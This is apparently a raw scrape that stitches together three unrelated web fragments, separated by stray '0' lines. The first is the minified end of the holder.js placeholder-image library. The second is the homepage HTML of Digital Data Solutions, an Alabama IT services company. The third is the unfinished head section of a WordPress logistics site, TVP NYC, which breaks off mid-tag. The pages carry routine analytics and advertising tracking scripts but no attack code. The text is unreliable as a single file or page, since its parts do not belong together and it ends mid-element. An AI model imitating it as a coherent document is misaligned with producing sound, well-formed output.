aG=null!=aE.src,aI=null!=aE.dataSrc&&0===aE.dataSrc.indexOf(G.domain),aK=null!=aE.rendered&&"true"==aE.rendered;aG?0===aE.src.indexOf(G.domain)?Q(G,w,aE.src,aC):aI&&(aK?Q(G,w,aE.dataSrc,aC):!function(g,h,i,j,k){aw(g,function(f){f||Q(h,i,j,k)})}(aE.src,G,w,aE.dataSrc,aC)):aI&&Q(G,w,aE.dataSrc,aC)}return this}},Z={settings:{domain:"holder.js",images:"img",objects:"object",bgnodes:"body .holderjs",stylenodes:"head link.holderjs",stylesheets:[],themes:{gray:{background:"#EEEEEE",foreground:"#AAAAAA"},social:{background:"#3a5a97",foreground:"#FFFFFF"},industrial:{background:"#434A52",foreground:"#C2F200"},sky:{background:"#0D8FDB",foreground:"#FFFFFF"},vine:{background:"#39DBAC",foreground:"#1E292C"},lava:{background:"#F8591A",foreground:"#1C2846"}}},defaults:{size:10,units:"pt",scale:1/16},flags:{dimensions:{regex:/^(\d+)x(\d+)$/,output:function(c){var d=this.regex.exec(c);return{width:+d[1],height:+d[2]}}},fluid:{regex:/^([0-9]+%?)x([0-9]+%?)$/,output:function(c){var d=this.regex.exec(c);return{width:d[1],height:d[2]}}},colors:{regex:/(?:#|\^)([0-9a-f]{3,})\:(?:#|\^)([0-9a-f]{3,})/i,output:function(c){var d=this.regex.exec(c);return{foreground:"#"+d[2],background:"#"+d[1]}}},text:{regex:/text\:(.*)/,output:function(b){return this.regex.exec(b)[1].replace("\\/","/")}},font:{regex:/font\:(.*)/,output:function(b){return this.regex.exec(b)[1]}},auto:{regex:/^auto$/},textmode:{regex:/textmode\:(.*)/,output:function(b){return this.regex.exec(b)[1]}},random:{regex:/^random$/},size:{regex:/size\:(\d+)/,output:function(b){return this.regex.exec(b)[1]}}}},ab=function(){var d=null,e=null,f=null;return function(a){var b=a.root;if(Z.setup.supportsSVG){var c=!1,o=function(g){return R.createTextNode(g)};(null==d||d.parentNode!==R.body)&&(c=!0),d=ao(d,b.properties.width,b.properties.height),d.style.display="block",c&&(e=am("text",N),f=o(null),an(e,{x:0}),e.appendChild(f),d.appendChild(e),R.body.appendChild(d),d.style.visibility="hidden",d.style.position="absolute",d.style.top="-100%",d.style.left="-100%");var p=b.children.holderTextGroup,q=p.properties;an(e,{y:q.font.size,style:ar({"font-weight":q.font.weight,"font-size":q.font.size+q.font.units,"font-family":q.font.family,"dominant-baseline":"middle"})}),f.nodeValue=q.text;var t=e.getBBox(),x=Math.ceil(t.width/(b.properties.width*Z.setup.lineWrapRatio)),y=q.text.split(" "),z=q.text.match(/\\n/g);x+=null==z?0:z.length,f.nodeValue=q.text.replace(/[ ]+/g,"");var A=e.getComputedTextLength(),B=t.width-A,C=Math.round(B/Math.max(1,y.length-1)),D=[];if(x>1){f.nodeValue="";for(var E=0;E<y.length;E++){if(0!==y[E].length){f.nodeValue=ay(y[E]);var F=e.getBBox();D.push({text:y[E],width:F.width})}}}return d.style.display="none",{spaceWidth:C,lineCount:x,boundingBox:t,words:D}}return !1}}(),ad=function(){var c=am("canvas"),d=null;return function(a){null==d&&(d=c.getContext("2d"));var b=a.root;c.width=Z.dpr(b.properties.width),c.height=Z.dpr(b.properties.height),d.textBaseline="middle",d.fillStyle=b.children.holderBg.properties.fill,d.fillRect(0,0,Z.dpr(b.children.holderBg.width),Z.dpr(b.children.holderBg.height));var l=b.children.holderTextGroup;l.properties;d.font=l.properties.font.weight+" "+Z.dpr(l.properties.font.size)+l.properties.font.units+" "+l.properties.font.family+", monospace",d.fillStyle=l.properties.fill;for(var m in l.children){var n=l.children[m];for(var o in n.children){var p=n.children[o],q=Z.dpr(l.x+n.x+p.x),r=Z.dpr(l.y+n.y+p.y+l.properties.leading/2);d.fillText(p.properties.text,q,r)}}return c.toDataURL("image/png")}}(),af=function(){if(O.XMLSerializer){var b=ao(null,0,0),d=am("rect",N);return b.appendChild(d),function(a,c){var o=a.root,p=c.holderSettings.flags.holderURL,q=R.createComment("\nSource URL: "+p+V);ao(b,o.properties.width,o.properties.height),b.insertBefore(q,b.firstChild);for(var r=b.querySelectorAll("g"),t=0;t<r.length;t++){r[t].parentNode.removeChild(r[t])}an(d,{width:o.children.holderBg.width,height:o.children.holderBg.height,fill:o.children.holderBg.properties.fill});var A=o.children.holderTextGroup,B=A.properties,C=am("g",N);b.appendChild(C);for(var D in A.children){var E=A.children[D];for(var F in E.children){var G=E.children[F],H=A.x+E.x+G.x,I=A.y+E.y+G.y+A.properties.leading/2,J=am("text",N),K=R.createTextNode(null);an(J,{x:H,y:I,style:ar({fill:B.fill,"font-weight":B.font.weight,"font-family":B.font.family+", monospace","font-size":B.font.size+B.font.units,"dominant-baseline":"central"})}),K.nodeValue=G.properties.text,J.appendChild(K),C.appendChild(J)}}var L="data:image/svg+xml;base64,"+btoa(unescape(encodeURIComponent(ap(b,c.engineSettings))));return L}}}(),ah=function(h){function i(d,e){for(var f in e){d[f]=e[f]}return d}var j=1,k=augment.defclass({constructor:function(b){j++,this.parent=null,this.children={},this.id=j,this.name="n"+j,null!=b&&(this.name=b),this.x=0,this.y=0,this.z=0,this.width=0,this.height=0},resize:function(c,d){null!=c&&(this.width=c),null!=d&&(this.height=d)},moveTo:function(d,e,f){this.x=null!=d?d:this.x,this.y=null!=e?e:this.y,this.z=null!=f?f:this.z},add:function(c){var d=c.name;if(null!=this.children[d]){throw"SceneGraph: child with that name already exists: "+d}this.children[d]=c,c.parent=this}}),l=augment(k,function(a){this.constructor=function(){a.constructor.call(this,"root"),this.properties=h}}),m=augment(k,function(b){function d(a,e){if(b.constructor.call(this,a),this.properties={fill:"#000"},null!=e){i(this.properties,e)}else{if(null!=a&&"string"!=typeof a){throw"SceneGraph: invalid node name"}}}this.Group=augment.extend(this,{constructor:d,type:"group"}),this.Rect=augment.extend(this,{constructor:d,type:"rect"}),this.Text=augment.extend(this,{constructor:function(c){d.call(this),this.properties.text=c},type:"text"})}),n=new l;return this.Shape=m,this.root=n,this};for(var aj in Z.flags){Z.flags.hasOwnProperty(aj)&&(Z.flags[aj].match=function(b){return b.match(this.regex)})}Z.setup={renderer:"html",debounce:100,ratio:1,supportsCanvas:!1,supportsSVG:!1,lineWrapRatio:0.9,renderers:["html","canvas","svg"]},Z.dpr=function(b){return b*Z.setup.ratio},Z.vars={preempted:!1,resizableImages:[],invisibleImages:{},invisibleId:0,visibilityCheckStarted:!1,debounceTimer:null,cache:{}},function(){var b=1,f=1,g=am("canvas"),h=null;g.getContext&&-1!=g.toDataURL("image/png").indexOf("data:image/png")&&(Z.setup.renderer="canvas",h=g.getContext("2d"),Z.setup.supportsCanvas=!0),Z.setup.supportsCanvas&&(b=O.devicePixelRatio||1,f=h.webkitBackingStorePixelRatio||h.mozBackingStorePixelRatio||h.msBackingStorePixelRatio||h.oBackingStorePixelRatio||h.backingStorePixelRatio||1),Z.setup.ratio=b/f,R.createElementNS&&R.createElementNS(N,"svg").createSVGRect&&(Z.setup.renderer="svg",Z.setup.supportsSVG=!0)}(),ak(),M(X,"Holder",O),O.onDomReady&&O.onDomReady(function(){Z.vars.preempted||X.run(),O.addEventListener?(O.addEventListener("resize",au,!1),O.addEventListener("orientationchange",au,!1)):O.attachEvent("onresize",au),"object"==typeof O.Turbolinks&&O.document.addEventListener("page:change",function(){X.run()})})}(function(e,f,g){var h="function"==typeof define&&define.amd;"object"==typeof exports;h?define(e):g[f]=e},this);
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-122591406-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-122591406-1'); </script> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"/> <title>DDS | Powered by ThreatAdvice</title> <link rel="stylesheet" media="all" href="/assets/application-3777e8ab11be36ba1ff7e8cc901df525eff7ede5b033f7a64344f567091bf49d.css" /> <meta name="csrf-param" content="authenticity_token" /> <meta name="csrf-token" content="Alx8r+GNE4OKjdiMWmfBuaA3GMg+3FwFetYklAuYTkDlpqnr3NzPqSdCe51W5Iq7QUt3AEQWBscTobXqKOCM7Q==" /> </head> <body class="home index"> <header class="container"> <nav class="navbar fixed-top navbar-expand-md navbar-light"> <a class="navbar-brand " href="/"><img alt="logo" class="img-fluid" src="/assets/dds-476c87c4f94bfa4faebefc90bb0c6c175d286fa481aeab41c5415e21a66a9ee2.svg" /></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarTogglerDemo02" aria-controls="navbarTogglerDemo02" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarTogglerDemo02"> <ul class="navbar-nav ml-auto mt-2 mt-lg-0"> <li class="nav-item"> <a class="nav-link" href="https://digitaldatasolutions.hostedrmm.com:8040/" target="_blank">Remote Support</a> </li> <li class="nav-item"> <a class="nav-link" href="https://na.myconnectwise.net/support/index.htm?Company=digitaldata" target="_blank">Login</a> </li> <li class="nav-item"> <a class="nav-link" href="/contact">Contact</a> </li> </ul> </div> </nav> </header> <div class="container-fluid slideshow-main"> <div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel" data-interval="10000"> <ol class="carousel-indicators"> <li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li> <li data-target="#carouselExampleIndicators" data-slide-to="1"></li> <li data-target="#carouselExampleIndicators" data-slide-to="2"></li> </ol> <div class="carousel-inner"> <div class="carousel-item active"> <img alt="Create a Human Firewall" class="d-block w-100 slideshow-img overlay" src="/assets/img1-e4595b1afa599714d15a6d3f0934bc204ac75b01bf9f86c2c31a6140071f6b43.jpg" /> <div class="carousel-caption"> <h1>Patch Management</h1> <p>Patch management is essential for protecting your systems from known attacks.</p> </div> </div> <div class="carousel-item"> <img alt="Create a Human Firewall" class="d-block w-100 slideshow-img overlay" src="/assets/img2-d71d2ae8d2f8e51992a89571fcd1de8f8d4872b31de2c9f695dbadada30b7e41.jpg" /> <div class="carousel-caption"> <h1>Our services are a perfect fit for your business.</h1> <p>Digital Data Solutions, LLC. is a locally owned and operated Information Technology group based in Mobile, Alabama and serves the surrounding areas along the Gulf Coast.</p> </div> </div> <div class="carousel-item"> <img alt="Create a Human Firewall" class="d-block w-100 slideshow-img overlay" src="/assets/img3-25cfbc5b70d04094b459feb3b5a64f7690bd8594ec8890692445f7dfcfba5b7d.jpg" /> <div class="carousel-caption"> <h1>You need a partner that you can trust to support you today!</h1> <p>Pay-as-you-Go, Discounted Blocks of Hours, and Monthly Service Plans offer you ultimate flexibility.</p> </div> </div> </div> <!-- <a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="sr-only">Previous</span> </a> <a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="sr-only">Next</span> </a> --> </div> </div> <div class="col-md-11 white-box container"> <div class="row"> <div class="col-md-9 col-sm-12 text-center"> Digital Data Solutions, LLC. is a locally owned and operated Information Technology group based in Mobile, Alabama and serves the surrounding areas along the Gulf Coast. </div> <div class="col-md col-sm-12"> <a href="/contact" class="button">Contact Us</a> </div> </div> </div> <div class="container-fluid about service"> <h2>Professional Services</h2> <div class="row justify-content-center three"> <div class="col-md-8"> <p>Our qualified team wants to help guide your IT journey day in and day out-not just when a fire needs to be put out. Our IT experts are certified, highly trained, and have years of experience which includes setting up networks for all business types, installing specialized software, and revamping outdated systems. Our strongest desire is to assist your business in maximizing efficiency, cutting costs, and doing everything we can to help you reach your business potential.</p> </div> </div> </div> <div class="container-fluid about"> <h2>Solutions</h2> <div class="row justify-content-center three"> <div class="col-md-4"> <i class="fa fa-handshake-o" aria-hidden="true"></i> <h3>Managed Network Services</h3> <p>Digital Data Solutions can provide your business with it's own "virtual" IT dept. or complement your existing IT staff with a variety of contracted time options. You need a partner that you can trust to support you today and meet your evolving business needs.</p> </div> <div class="col-md-4"> <i class="fa fa-desktop" aria-hidden="true"></i> <h3>Remote Monitoring and Management</h3> <p>Our Remote Monitoring and Management software allows us to discover all devices and users on your network so that they can be proactively monitored. Patch management is essential for protecting your systems from known attacks. Let us manage this for you while you focus on growing your business.</p> </div> <div class="col-md-4"> <i class="fa fa-bar-chart" aria-hidden="true"></i> <h3>IT Consulting and Implementation</h3> <p>Computers and their software are business tools that should be leveraged to their fullest to significantly improve your bottom line. Our team will listen and learn about your business so that we can then apply our technical expertise to help you create new efficiencies and implement new ideas in order to help you become the most efficient, profitable, and impactful business you can possibly be.</p> </div> </div> </div> <div class="container-fluid how-it-works tip"> <div class="col-md-12"> <h2>Experience Counts. Contact Digital Data Solutions today!</h2> </div> </div> <footer id="footer container"> <div class="row"> <div class="col-md-4"> <a class="navbar-brand " href="/"><img alt="logo" class="img-fluid" src="/assets/dds-476c87c4f94bfa4faebefc90bb0c6c175d286fa481aeab41c5415e21a66a9ee2.svg" /></a> <p class="">&copy; 2019 Digital Data Solutions. <br>All rights reserved.<!-- <br><a target="_blank" href="">Terms of Use</a> | <a target="_blank" href="">Privacy Policy</a> --></p> </div> <div class="col-md-4"> <ul> <li> <a href="https://digitaldatasolutions.hostedrmm.com:8040/" target="_blank">Remote Support</a> </li> <li> <a href="https://na.myconnectwise.net/support/index.htm?Company=digitaldata" target="_blank">Login</a> </li> <li> <a href="/contact">Contact</a> </li> </ul> </div> <div class="col-md-4"> <p>3737 Government Blvd Ste 304c<br>Mobile, AL 36693</p> <p>P: 251.445.3371<br>F: 251.800.9003</p> <p>[email protected]</p> </div> </div> <div class="row"> <div class="col-md-12 text-center"> <img alt="made in the usa" class="usa" src="/assets/usa-10be325f092a972de09caeb5da15ba965c7122623a66ea56a14906d9eee31e9e.jpg" /> </div> </div> <script type="text/javascript" language="javascript"> var sf14gv = 29347; (function() { var sf14g = document.createElement('script'); sf14g.type = 'text/javascript'; sf14g.async = true; sf14g.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 't.sf14g.com/sf14g.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sf14g, s); })(); </script> </footer> <script src="/assets/application-73f22493b5d3f673af739b22e9d6e0b66e4c0a01bf78fd62b2ada10110824aa4.js"></script> </body> <script type="text/javascript"> _linkedin_partner_id = "412761"; window._linkedin_data_partner_ids = window._linkedin_data_partner_ids || []; window._linkedin_data_partner_ids.push(_linkedin_partner_id); </script><script type="text/javascript"> (function(){var s = document.getElementsByTagName("script")[0]; var b = document.createElement("script"); b.type = "text/javascript";b.async = true; b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js"; s.parentNode.insertBefore(b, s);})(); </script> <noscript> <img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=412761&fmt=gif" /> </noscript> </html>
0
<!DOCTYPE HTML> <html class="" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <title>Home- TVP NYC - 4PL Made Flexible</title> <!-- DO NOT COPY THIS SNIPPET! Start of Page Analytics Tracking for HubSpot WordPress plugin v7.0.4 --> <script type="text/javascript"> var _hsq = _hsq || []; _hsq.push(["setContentType", "standard-page"]); </script> <!-- DO NOT COPY THIS SNIPPET! End of Page Analytics Tracking for HubSpot WordPress plugin --> <!-- This site is optimized with the Yoast SEO plugin v9.6 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://tvp.nyc/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home- TVP NYC - 4PL Made Flexible" /> <meta property="og:url" content="https://tvp.nyc/" /> <meta property="og:site_name" content="TVP NYC - 4PL Made Flexible" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Home- TVP NYC - 4PL Made Flexible" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://tvp.nyc/#website","url":"https://tvp.nyc/","name":"TVP NYC - 4PL Made Flexible","potentialAction":{"@type":"SearchAction","target":"https://tvp.nyc/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//js.hs-scripts.com' /> <link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="TVP NYC - 4PL Made Flexible &raquo; Feed" href="https://tvp.nyc/feed/" /> <link rel="alternate" type="application/rss+xml" title="TVP NYC - 4PL Made Flexible &raquo; Comments Feed" href="https://tvp.nyc/comments/feed/" /> <meta name="viewport" content="width=device-width, initial-scale=1"><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"><meta name="theme-color" content="#f5f5f5"> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/tvp.nyc\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='font-awesome-official-css' href='https://use.fontawesome.com/releases/v5.6.3/css/all.css' type='text/css' media='all' integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous" /> <link rel='stylesheet' id='font-awesome-official-v4shim-css' href='https://use.fontawesome.com/releases/v5.6.3/css/v4-shims.css' type='text/css' media='all' integrity="sha384-DrjN/yxBJAblffPf548CARk30Xz2Glal7YO5kqQ8c8GHgrAMXZN2ZDTGwV9xTDJF" crossorigin="anonymous" /> <link rel='stylesheet' id='wp-block-library-css' href='https://tvp.nyc/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://tvp.nyc/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.2' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='bodhi-svgs-attachment-css' href='https://tvp.nyc/wp-content/plugins/svg-support/css/svgs-attachment.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='us-fonts-css' href='https://fonts.googleapis.com/css?family=Montserrat%3A400%2C500%2C600%2C700%2C800%2C900%7CRaleway%3A500%2C400%2C600%2C700%2C800%2C900%7COpen+Sans%3A400%2C600%2C700%2C800&#038;subset=latin&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='us-style-css' href='//tvp.nyc/wp-content/themes/Impreza/css/style.min.css?ver=5.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='us-responsive-css' href='//tvp.nyc/wp-content/themes/Impreza/css/responsive.min.css?ver=5.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='bsf-Defaults-css' href='https://tvp.nyc/wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ultimate-google-fonts-css' href='https://fonts.googleapis.com/css?family=Montserrat:regular,700&#038;subset=latin' type='text/css' media='all' /> <link rel='stylesheet' id='ultimate-style-min-css' href='https://tvp.nyc/wp-content/plugins/Ultimate_VC_Addons/assets/min-css/ultimate.min.css?ver=3.17.1' type='text/css' media='all' /> <script type='text/javascript' src='https://tvp.nyc/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://tvp.nyc/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.2'></script> <script type='text/javascript' src='https://tvp.nyc/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var cssTarget = {"Bodhi":"img.style-svg","ForceInlineSVG":"style-svg"}; var ForceInlineSVGActive = "true"; /* ]]> */ </script> <script type='text/javascript' src='https://tvp.nyc/wp-content/plugins/svg-support/js/min/svgs-inline-min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://tvp.nyc/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://tvp.nyc/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js?ver=3.17.1'></script> <script type='text/javascript' src='https://tvp.nyc/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate_bg.min.js?ver=5.2'></script> <link rel='https://api.w.org/' href='https://tvp.nyc/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tvp.nyc/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://tvp.nyc/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://tvp.nyc/' /> <link rel="alternate" type="application/json+oembed" href="https://tvp.nyc/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftvp.nyc%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://tvp.nyc/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftvp.nyc%2F&#038;format=xml" /> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '769247896515044'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=769247896515044&ev=PageView&noscript=1" /></noscript> <!-- End Facebook Pixel Code --> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-123217708-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-123217708-1'); </script> <script type='text/javascript'> (function() { var wa = document.createElement('script'); wa.type = 'text/javascript'; wa.async = true; wa.src = 'https://d10lpsik1i8c69.cloudfront.net/w.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wa, s); })(); </script> <script> if (!/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { var root = document.getElementsByTagName('html')[0] root.className += " no-touch"; } </script> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://tvp.nyc/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.8.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="https://tvp.nyc/wp-content/uploads/2019/02/cropped-tvp_web_icon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://tvp.nyc/wp-content/uploads/2019/02/cropped-tvp_web_icon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://tvp.nyc/wp-content/uploads/2019/02/cropped-tvp_web_icon-180x180.png" /> <meta name="msapplication-TileImage" content="https://tvp.nyc/wp-content/uploads/2019/02/cropped-tvp_web_icon-270x270.png" /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1554218228856{padding-top: -60px !important;}.vc_custom_1546632863648{margin-top: 40px !important;margin-bottom: 40px !important;}.vc_custom_1546632975927{margin-top: 40px !important;margin-bottom: 40px !important;}.vc_custom_1546627736970{padding-bottom: 60px !important;}.vc_custom_1546627746242{padding-bottom: 60px !important;}.vc_custom_1544720194692{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720208597{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720221579{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720234849{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720246355{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720261500{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720281850{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720296609{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720309964{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720325857{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1552670507619{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1553184510424{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720362104{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720379553{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544720392032{padding-top: 20px !important;padding-right: 20px !important;padding-bottom: 20px !important;padding-left: 20px !important;}.vc_custom_1544725044009{padding-bottom: 30px !important;}.vc_custom_1544725012390{margin-top: 50px !important;}.vc_custom_1551305059603{margin-bottom: 25px !important;}.vc_custom_1544725954440{padding-right: 30px !important;padding-left: 30px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <style 